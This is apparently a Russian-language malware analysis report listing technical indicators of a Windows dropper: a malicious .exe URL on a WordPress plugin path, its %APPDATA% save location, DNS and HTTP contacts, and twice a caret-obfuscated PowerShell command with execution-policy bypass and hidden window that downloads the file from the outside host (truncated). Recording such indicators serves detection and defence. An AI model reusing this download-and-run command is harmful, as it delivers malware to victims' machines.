Техническая информация
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^weRSHe^L^l.Exe^ -EXE^cUT^iO^Np^OLicY Byp^ASS -no^PR^OFiLE ^-wI^NDo^wStyL^e hId^d^eN^ (nE^W-OB^jE^cT ^s^Y^stE^M^.^net.wE^b^cl^Ien^t)^.^dO^W^N^lO^ADF^I^LE('http://nsholiday.com/w...
- %APPDATA%.exe
- 'ns###iday.com':80
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
- DNS ASK ns###iday.com
- '<SYSTEM32>\cmd.exe' /C "po^weRSHe^L^l.Exe^ -EXE^cUT^iO^Np^OLicY Byp^ASS -no^PR^OFiLE ^-wI^NDo^wStyL^e hId^d^eN^ (nE^W-OB^jE^cT ^s^Y^stE^M^.^net.wE^b^cl^Ien^t)^.^dO^W^N^lO^ADF^I^LE('http://nsholiday.com/w...' (со скрытым окном)